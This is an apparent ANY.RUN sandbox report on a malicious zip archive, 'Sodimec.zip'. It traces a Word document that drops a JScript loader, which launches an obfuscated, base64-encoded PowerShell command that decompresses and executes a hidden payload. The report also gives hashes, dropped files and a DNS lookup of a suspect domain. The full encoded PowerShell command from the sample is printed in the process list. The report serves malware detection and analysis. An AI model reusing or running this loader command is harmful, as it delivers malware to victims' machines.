analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sodimec.zip

Full analysis: https://app.any.run/tasks/7cacc60d-0d21-4fac-9a2d-3a6e9a188ae1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 13:49:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
malscr-1
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

EC232C3747B8CF7E1C463ED6BB08C36C

SHA1:

A14FA5736E3BD1E38A6442D305FA0D45DDC414B5

SHA256:

2AD563C56C7D800E44C2EB21B9E52B7A6C1EC25B49DF5D41CA80A892218424F2

SSDEEP:

1536:xiI1Tqz6cMN3tWboUEEgU/0wnldkO/qz3v:xOOH40UNB/0AldkOy7v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops known JS loader

      • WINWORD.EXE (PID: 3204)

    • Executes scripts

      • WINWORD.EXE (PID: 3204)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3204)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2828)

    • Creates files in the Windows directory

      • WINWORD.EXE (PID: 3204)
      • powershell.exe (PID: 2128)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2092)

    • Creates files in the user directory

      • powershell.exe (PID: 2128)

    • Removes files from Windows directory

      • powershell.exe (PID: 2128)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3204)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3204)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: info_09_24.doc
ZipUncompressedSize: 89088
ZipCompressedSize: 50338
ZipCRC: 0x4cf7dee8
ZipModifyDate: 2019:09:24 00:11:06
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs wscript.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2828"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sodimec.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3204"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2828.48393\info_09_24.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2092"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\snykmyaeci.js" C:\Windows\System32\WScript.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
2128"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcARABjAHEAeABEAG8ASQB3AEUAQQBEAFEAWAAyAEUAZwBPAFkAaAA2AFIAUgBZAE4AaABEAGkAQQBKAGkAWQBOAEUAdwBrAEwAQQA0AEkAWABXAHIAVwA5AEMAawAzAHcAOAAyAFYANgB5AHcAdABYAEcAZwBxAE0AdwBNAEkATwBhAEQAMwB3AHgAdgBDAGkAMABVAE0AYwAxAE4AUQAzAFAAYgBZADAAOQBLAFgAVQBWAEQAZAA1AEUARwA0AFoASwAyADYAdAA1AEUAZAAxAHUAOAB0AHIAQgBNAHAANwBsAHcAawB4AGEAVQBQAFcATwArAFkAMwBqAG0AegBFAGwAegBXAGQANQAwAG0AWQBvADAAawBOAE8AdQBVAHUAbgA4AEkAdAA3AE8AYwBVADEAUQBUADcAQQBNAHEAcwBhADcAVgA5ADgAcgBwADAARABSAG4AWABuAFoASQBFADYAVQBjAFEANQAzADgAPQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIAZQBzAHMASQBPAE4ATQBPAEQARQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBFAEEARABFAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBBAGQAVABvAEUATgBEACgAKQAgAH0AIAApACAAfAAuACgAJwBJAGUAeAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 960
Read events
1 459
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3204WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAD04.tmp.cvr
MD5:
SHA256:
2128powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EMPNPTNLXLPIT8OLNYK7.temp
MD5:
SHA256:
2128powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
2128powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18b783.TMPbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
2828WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2828.48393\info_09_24.docdocument
MD5:3736E814E1011B02B2574C177580AF6B
SHA256:BA73EE6C242906B6A33E41CCBFC4A879BCAAC5EA6B0810BDF01F6283FBF6C5FE
3204WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2828.48393\~$fo_09_24.docpgc
MD5:C7B643BB0008D86741C210F88A058851
SHA256:A110116B3D8C24B41D236CE717D4320FEA648BBFD8EEE80A3E3662A2087D1E34
3204WINWORD.EXEC:\Windows\Temp\snykmyaeci.jstext
MD5:E58C8A410079599A0B005C329C76CA4C
SHA256:709A93CEBA56B209CC55918B17886B22C79E4C250039D0C40D806646698529E1
3204WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:747B91F182BBFD43D80201147D2DFE77
SHA256:7372C75DD1948322EB7193CCD4290842D3372BE3426836E9123560D9B96A4706
3204WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B6A518314235DFA84DB2AB642EA21027
SHA256:B67398B70B750FD6B48FF4B87F2B7AB8EE96A3521A87B74A8952C3CB1B4CBFE6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
gimentpook.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Sodimec.zip